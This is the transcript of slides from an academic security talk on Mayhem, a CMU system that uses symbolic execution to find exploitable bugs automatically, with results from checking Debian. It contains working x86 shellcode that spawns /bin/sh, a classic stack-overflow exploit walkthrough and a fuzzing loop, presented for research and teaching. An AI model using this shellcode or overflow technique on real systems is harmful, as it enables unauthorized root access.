Checking the World’s Software for Exploitable Bugs
David Brumley, Carnegie Mellon University
[email protected]
http://security.ece.cmu.edu/

Checking the World’s Software for Exploitable Bugs

Feb 24, 2016


Transcript

Darpa Presentation

Checking the World’s Software for Exploitable Bugs
David Brumley, Carnegie Mellon University
[email protected]
http://security.ece.cmu.edu/
Speaker note: Stand up straight. PPW

Black (“format c:”) vs. White

An epic battle
Speaker notes: First sentence: I love computer security. I love that it’s an epic battle between white vs black, us vs them, good vs. evil. It’s the only area of computer science that brings alive the notion of an adversary. In security, adversaries really exist.

Black (“format c:”) vs. White: Bug

Exploit bugs

    $ iwconfig accesspoint
    $ iwconfig
    #OK01ad 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 fce8 bfff 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 3101 50c0 2f68 732f 6868 622f 6e69 e389 5350 e189 d231 0bb0 80cd
    Superuser

Exploit

Black (“format c:”) vs. White

Bug Fixed!

Fact: Ubuntu Linux has over 99,000 known bugs

The bug hunt script from the slide (every program in /usr/bin, every single-letter option, an 8000-byte argument, one second each):

    # 8000 'A' characters as the argument value
    inp=`perl -e '{print "A"x8000}'`
    for program in /usr/bin/*; do
      for opt in {a..z} {A..Z}; do
        # kill the program with SIGKILL after one second
        timeout -s 9 1s $program -$opt $inp
      done
    done

1009 Linux programs. 13 minutes. 52 new bugs in 29 programs.

Which bugs are exploitable?

Evil David

Plaid Parliament of Pwning: CMU Hacking Team

DEF CON 2012 scoreboard

CMU. Time (3 days total). A Manual Process.

DEF CON 2013

“I skate to where the puck is going to be, not where it has been.” --- Wayne Gretzky, Hockey Hall of Fame

White

Our Vision: Automatically Check the World’s Software for Exploitable Bugs

We owned the machine in seconds

Evil David

Verification, but with a twist
Verification takes a Program and a Correctness Property and answers Correct (safe paths) or Incorrect. The twist: give it an Un-exploitability Property instead, so that Incorrect means Exploit.

33,248 programs, 152 new exploitable bugs

Outline
Basic exploitation
Symbolic execution for exploit generation
Automatic exploit generation on real code
Experiments
Related projects and the future

Control flow hijack: the attacker gains control of execution

Buffer overflow, format string attack, heap metadata overwrite, use-after-free, ... Same principle, different mechanism.

Process Memory: basic execution semantics of compiled code
Memory holds Code, Data, the Stack and the Heap. The Processor fetches, decodes and executes instructions, and reads and writes memory. EIP, the Instruction Pointer, points to the next instruction to execute. Start with code in memory.
Control Flow Hijack: EIP = Attacker Code

Buffer overflows and the runtime stack
Control flow hijack when input length > buffer length. Covers local variables and execution semantics, including call/return. (Speaker note: Go over program.)

    int vulnerable(char *input)
    {
        char buf[32];
        int x;
        if (...) { x = 1; } else { x = 0; }
        strcpy(buf, input);
        return x;
    }

vulnerable’s initial stack frame, from higher to lower addresses: ... char *input, saved eip, caller’s ebp, 32 bytes for buf, int x, char *buf. Locals are allocated on the stack.

Writes go up! With input = "ABC\0", strcpy writes A, B, C, \0 starting at the low end of buf and moving toward the saved eip.

    caller() {
      i:   vulnerable(input);
      i+1: ...
    }

The return address i+1 is stored as the saved eip in vulnerable’s frame. A buffer overflow occurs when data is written outside of the space allocated for the buffer. C does not check that writes are in-bound.

Classic Exploit: overwrite the saved EIP. (More advanced methods, like Return-Oriented Programming, can also be automatically generated in our research.) Traditionally we show exploitability by running shellcode. (Speaker note: The key here is predetermined allocation.)

Shellcode is a string. Author: kernel_panik, http://www.shell-storm.org/shellcode/files/shellcode-752.php

    \x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80

This executable string is the compiled form of execve("/bin/sh", 0, 0);

input = shellcode . address of buf. strcpy places the shellcode in buf and the trailing &buf over the saved eip, so when vulnerable returns, %eip = execve("/bin/sh", NULL). Owned!

Automatically finding exploitable bugs
Verification, but with a twist: Program + Correctness Property gives Correct (safe path) or Incorrect; Program + Un-exploitability Property gives Correct or Exploitable.

We use symbolic execution to test paths [Boyer75, Howden75, King76].

Basic symbolic execution. Example program:

    x = input()
    if x > 42 ...
    if x*x = MAXINT ...
    if x < 42 ...
    jmp stack[x]

Symbolic execution runs on symbolic input: x can be anything. Each branch taken (t or f) adds a conjunct, giving a path formula that is true for exactly the inputs that take that path:

    x > 42
    (x > 42) ∧ (x*x != MAXINT)
    (x > 42) ∧ (x*x != MAXINT) ∧ !(x < 42)

A Satisfiability Modulo Theory (SMT) solver decides the path formula: Satisfiable (x = 43), so x = 43 is a test case for that path.

The remaining branches give the formulas (x > 42) ∧ (x*x != MAXINT) ∧ (x < 42) and (x > 42) ∧ (x*x == MAXINT); the latter path is Un-exploitable.

Checking non-exploitability. Un-exploitability property: EIP != user input. For each path (stack: ... char *input, saved eip, caller’s ebp, 32 bytes for buf ...), the SMT solver checks eip != user input: UNSAT (exploit), SAT (safe).

Exploit generation can be cast as a verification problem.

Real world exploit generation: a brief history
2005 Automatic Discovery of API-Level Exploits [Ganapathy et al., Conference on Software Engineering]
2008 Automatic Patch-Based Exploit Generation [Brumley et al., IEEE Security and Privacy Symposium]
2010 Automatic Generation of Control Flow Hijack Exploits for Commodity Software [Heelan, MS Thesis]
2011 Automatic Exploit Generation [Avgerinos et al., Network and Distributed System Security Symposium]
2011 Q: Exploit Hardening Made Easy [Schwartz et al., USENIX Security Symposium]
2012 Unleashing Mayhem on Binary Code [Cha et al., IEEE Security and Privacy Symposium]
And >150 papers on symbolic execution (ours and others).

Exploiting Real Code: The Mayhem Architecture
Principles:
Require only the binary, e.g., BAP, our binary analysis platform.
Use intelligent analysis to reduce the state space, e.g., preconditioned symbolic execution.
Make queries to SMT as easy as possible, e.g., symbolic memories.

Potentially infinite state space. strcpy(buf, input) is a loop:

    while (input[i] != 0) {
        buf[i] = input[i];
        i++;
    }
    buf[i] = 0;

Every iteration is a branch: if (input[0] != 0) t/f, if (input[1] != 0) t/f, ..., if (input[n] != 0) t/f. Checking every branch blindly costs 20 min of exploration, then 30 min, then x min before the exploitable bug is found. KLEE [Cadar08] does this.

Preconditioned symbolic execution
All inputs ⊃ inputs that trigger the bug ⊃ inputs that hijack control. Preconditions focus the search, e.g.: input > len. Other examples in [Avgerinos11]. (Speaker note: input vs bugs doesn’t typecheck.)

Static and online analysis determines likely exploit conditions. Example: length precondition. For

    char buf[32];
    int x;
    ...
    strcpy(buf, input);

the likely exploit condition is an input of 40 bytes, all non-NULL (the 40 bytes span from buf to the saved eip in the frame: ... char *input, saved eip, caller’s ebp, 32 bytes for buf ...).

Precondition Check on each loop branch:
if (input[0] != 0): length(input) > 40 ∧ input[0] == 0 is Unsatisfiable. Not explored. Saved 20 min.
if (input[1] != 0): length(input) > 40 ∧ input[1] == 0 is Unsatisfiable. Not explored. Saved 30 min.
...
if (input[n] != 0): Not explored. Saved x min. Exploitable bug found.

Symbolic execution runs on symbolic input: the path formula (x > 42) ∧ (x*x != 0xffffffff) ∧ !(x < 42) goes to the SMT Solver, which answers SAT (x = 43). Don’t treat the solver as a black box: program the SMT.

Symbolic memory indices

    x := user_input();
    y := mem[x];
    assert(y = 42);
    vulnerable();

x can be anything. Which memory cell contains 42? 2^32 cells to check (Memory 0 .. 2^32 - 1). There are more causes.
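A toy model of the preconditioned symbolic execution described above, added here as an illustration; it is not code from the deck or from Mayhem. Path constraints are literals over symbolic input bytes, satisfiable() stands in for the SMT solver, and MAX_INPUT is an assumed exploration bound:

```python
# Added example (not from the slides): preconditioned symbolic execution of
# the strcpy copy loop `while (input[i] != 0) { buf[i] = input[i]; i++; }`.
# A path constraint is a list of (byte_index, must_be_zero) literals.
OVERWRITE_LEN = 40   # slide: 40 non-NULL bytes reach the saved EIP
MAX_INPUT = 64       # assumption: explore at most 64 loop iterations

def satisfiable(constraints):
    """Toy SMT stand-in: a conjunction of byte literals is consistent
    unless some byte is required to be both zero and non-zero."""
    seen = {}
    for idx, must_be_zero in constraints:
        if seen.setdefault(idx, must_be_zero) != must_be_zero:
            return False
    return True

def length_precondition(n=OVERWRITE_LEN):
    """length(input) > n, i.e. input[0..n-1] are all non-NULL."""
    return [(j, False) for j in range(n)]

def explore(precondition=()):
    """Enumerate every feasible loop exit (the false branch of
    input[i] != 0). Returns (paths explored, non-exploit paths explored).
    An exit at i >= OVERWRITE_LEN means the copy already overwrote the
    saved return address, i.e. the exploitable path was reached."""
    explored, wasted = 0, 0
    path = list(precondition)
    for i in range(MAX_INPUT):
        exit_here = path + [(i, True)]     # false branch: terminator at i
        if satisfiable(exit_here):         # blind: always; focused: only i >= 40
            explored += 1
            if i < OVERWRITE_LEN:
                wasted += 1
        path = path + [(i, False)]         # true branch: byte i non-zero
        if not satisfiable(path):
            break
    return explored, wasted

if __name__ == "__main__":
    print("blind   :", explore())                       # (64, 40)
    print("focused :", explore(length_precondition()))  # (24, 0)
```

Blind exploration spends 40 paths on harmless short inputs before the first overflow; with the precondition those 40 branches are unsatisfiable and never explored.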

Symbolic addresses occur often. Other causes:
Parsing: sscanf, vfprintf, etc.
Character test: isspace, isalpha, etc.
Conversion: toupper, tolower, mbtowc, etc.

    c = get_char();
    ...
    to_lower(c);

    char to_lower(char c)
    {
        /* table lookup: the address tbl + c is symbolic when c is */
        return (c >= -128 && c < 256) ? tbl[c] : c;
    }

The address tbl + c (the table ... a b c d ...) is symbolic.

Concretization: test case generation

    x := user_input();
    y := mem[30];
    assert(y = 42);
    vulnerable();

Fixing x to a concrete value leaves 1 cell to check (cell 30 of Memory 0 .. 2^32 - 1): Solvable, but this misses over 40% of exploits. Used by e.g. SAGE, DART, CUTE, KLEE. There are more causes.

Observation: the path formula constrains the range of symbolic memory accesses.

    y = mem[x]
    assert(y == 42)

with branches x > 0 (t/f) and x < 5 (t/f): x can be anything, but on the path taken we know 0 < x < 5. Use the symbolic execution state to:
Step 1: Bound the memory addresses referenced.
Step 2: Reduce to linear formulas.

(Index/Value table of the cells in range.) Given 0 < x < 5 and y = mem[x], the bounded region is described by piecewise linear equations, y = 2*x + 10 and y = -2*x + 28. Result: 40% more exploits (strength reduction). See the paper for details.

Experiments with Mayhem: known exploitable bugs; coverage for 997 programs; checking Debian.

2 unknown bugs: FreeRadius, GnuGol [Cha et al, NDSS12]. Windows and Linux.

Coverage: code coverage measures the percentage of statements executed at least once by the symbolic executor.
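The two-step symbolic-memory reduction described above, as an added example that is not the deck's or Mayhem's code. The memory contents are constructed so that the region 0 < x < 5 yields the deck's two equations; the constraint encoding and function names are assumptions:

```python
# Added example (not from the slides): bound a symbolic index from the path
# formula, then replace the memory lookup by piecewise linear equations.
MEM = {0: 7, 1: 12, 2: 14, 3: 22, 4: 20, 5: 99}   # constructed contents

def bound_index(path_constraints, bits=32):
    """Step 1: turn branch conditions ('>', c) / ('<', c) on x into the
    closed interval [lo, hi] of cells the load y = mem[x] can touch."""
    lo, hi = 0, 2 ** bits - 1
    for op, c in path_constraints:
        if op == '>':
            lo = max(lo, c + 1)
        elif op == '<':
            hi = min(hi, c - 1)
    return lo, hi

def piecewise_linear(mem, lo, hi):
    """Step 2: split mem[lo..hi] into maximal runs where the value is
    linear in the index; returns [(start, end, a, b)] with y = a*x + b."""
    segments, x = [], lo
    while x <= hi:
        if x == hi:                       # lone trailing cell: constant piece
            segments.append((x, x, 0, mem[x]))
            break
        a = mem[x + 1] - mem[x]           # slope from the first two cells
        b = mem[x] - a * x
        end = x + 1
        while end < hi and mem[end + 1] == a * (end + 1) + b:
            end += 1                      # extend while the line still fits
        segments.append((x, end, a, b))
        x = end + 1
    return segments

def solve_load(segments, target):
    """Solve mem[x] == target over the linear pieces instead of asking the
    solver to search 2^32 cells; returns every index x that works."""
    hits = []
    for start, end, a, b in segments:
        if a == 0:
            if b == target:
                hits.extend(range(start, end + 1))
        elif (target - b) % a == 0 and start <= (target - b) // a <= end:
            hits.append((target - b) // a)
    return hits

if __name__ == "__main__":
    lo, hi = bound_index([('>', 0), ('<', 5)])          # (1, 4)
    segs = piecewise_linear(MEM, lo, hi)                # y=2x+10, y=-2x+28
    print(segs, solve_load(segs, 22))                   # ... [3]
```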

Mayhem coverage measured on 997 programs compiled with gcov from /usr/bin and /bin

50% on average tested, 50% unchecked: gcov coverage per program (plot of programs vs. coverage).

Unique code lines covered: total unique lines (all programs): 2,245,632; lines covered (all programs): 437,455; absolute coverage: 19.48%. Achieving 100% is impossible due to dead code and other factors!

Checking Debian: 33,248 programs; 199,685,594 test cases; 2,365,154 crashes; 11,690 unique bugs; 152 new exploits; 2,727 days CPU time; 15,914,407,892 SMT queries; 28 cents a bug; 21 dollars an exploit.

Public data: http://forallsecure.com/summaries

Mining the data
Q: How long do queries take on average? A: 3.67ms on average with 0.34 variance.
Q: Should I optimize hard or easy formulae? A: 99.99% take less than 1 second and account for 78% of total time. Optimize fast queries.
Q: Do queries get harder? A: Good question...

    > basicStat()

    Q. How many programs do you have?
    #program 957

    Q. How many SMT formulae have you queried and solved (within timeout)?
    #query 20223626

    Q. Among those, how many are SAT? UNSAT?
    #sat 2544620   #unsat 17679006

    Q. How many programs yield *fresh* formulae that take at least 1 second to solve?
    #program 563

    Q. How many *distinct* SMT formulae take at least 1 second to solve?
    #formula 18663

    Q. What are the basic statistics on the TIME it took to solve these formulae?
                  both          sat           unsat
    time sum      387213.9      95185.1       292028.8
    time max      277.2653      107.1409      277.2653
    time avg      0.01914661    0.03740641    0.0165184
    time var      0.06179814    0.07019839    0.06053416

    Q. What are the basic statistics on the number of VARIABLES in these formulae?
                  both          sat           unsat
    vars max      111           89            111
    vars avg      15.12656      16.42357      14.93987
    vars var      35.7964       53.92014      32.91078

    Q. What are the basic statistics on the number of CLAUSES in these formulae?
                  both          sat           unsat
    clauses max   275990        275990        275990
    clauses avg   968.1475      669.0946      1011.192
    clauses var   6801531       11601246      6095962

    Q. What are the basic statistics on the number of AST Nodes in these formulae?
                  both          sat           unsat
    astnodes max  3354063       3354063       3354060
    astnodes avg  15234.39      11408.75      15785.04
    astnodes var  1044798320    1788943562    935280428

    Q. What are the basic statistics on the DEPTH of exploration when generating these formulae?
                  both          sat           unsat
    depth max     19557         3587          19557
    depth avg     283.9193      189.2816      297.5409
    depth var     129693.1      73239.32      136344.1

500 sec timeout. No dominant upward trend in time to solve.

Size is not strongly correlated with hardness (SAT, UNSAT).

Hardness is (likely) localized (diagram: a symbolic execution thread with one hard query; Depth 0 (pointer resolution), Depth 1, Depth 2).

Only 39 programs create hard formulas. Example: a/10 replaced with (a*0xcccccccd) >> 3.

We are not perfect. We don’t claim to find all exploitable bugs: exploitability vs. safe with respect to a fixed input size; better symbolic execution. But each report is actionable.

Symbolic execution thrusts
1. Formalize Exploit: control flow hijack, information leaks, command injection.
2. Binary Program Verification: path merging, faster SMT.
3. Real Code: handle messy details, transactional rollback.

The larger pipeline
Program Analysis (symbolic execution, static analysis, fuzzing) → Triage (unpatched code clones, scheduling) → Check OS Distribution.
BAP [Brumley11], Decompiler [Schwartz13].
Weighted coupon bug collecting with randomized MAB algorithms: 1.55x more bugs [Woo13].
15,546 vulns [Jang12]. Mayhem: 11,690 bugs, 152 exploits [Cha11, Avgerinos12].
2 year total: 27,659 bugs (423 from fuzzing + 15,546 from ReDeBug + 11,690 from Mayhem), 15,698 vulns.

We’re not even close to done.

Breaking the Satisfiability Barrier (NSF, with Tinelli and Barrett).
ReGEAC: Refinement-Based Component Analysis for Binary Code (DARPA, with Engler).
And others: SMT Hardness (w/ Williams); Exploiting multi-core for behavior-based detection and repair (NSF, w/ Mutlu, Mowry); Vetting commodity systems (DARPA, w/ Gligor, Jaeger); ...
High School Hacking Competition.

White

Our Vision: Automatically Check the World’s Software for Exploitable Bugs. It seems wrong to not try.

Thank You! Questions?

Credits

Postdocs: Manuel Egele, Maverick Woo.
PhD Students: Thanassis Avgerinos, Tiffany Bao, Sang Kil Cha, Peter Chapman, Samantha Gottlieb, Jiyong Jang, Matt Maurer, Alex Rebert, Ed Schwartz, Jonathan Burket.
Undergrads: David Kohlbrenner, Tyler Nighswander, Brian Pak.
Collaborators: Robert Brumley, Jonathan Diamond, Brent Ledvina.
Special Thanks: Coherent Navigation, Mike Carns, Pete Kind, Barbara McNamara.
Funding: Core Security, DARPA, Google, Lockheed Martin, Northrop Grumman, NSA, NSF, SEI, ODNI, Symantec, Microsoft, Wiley, Pearson, Amazon AWS.

END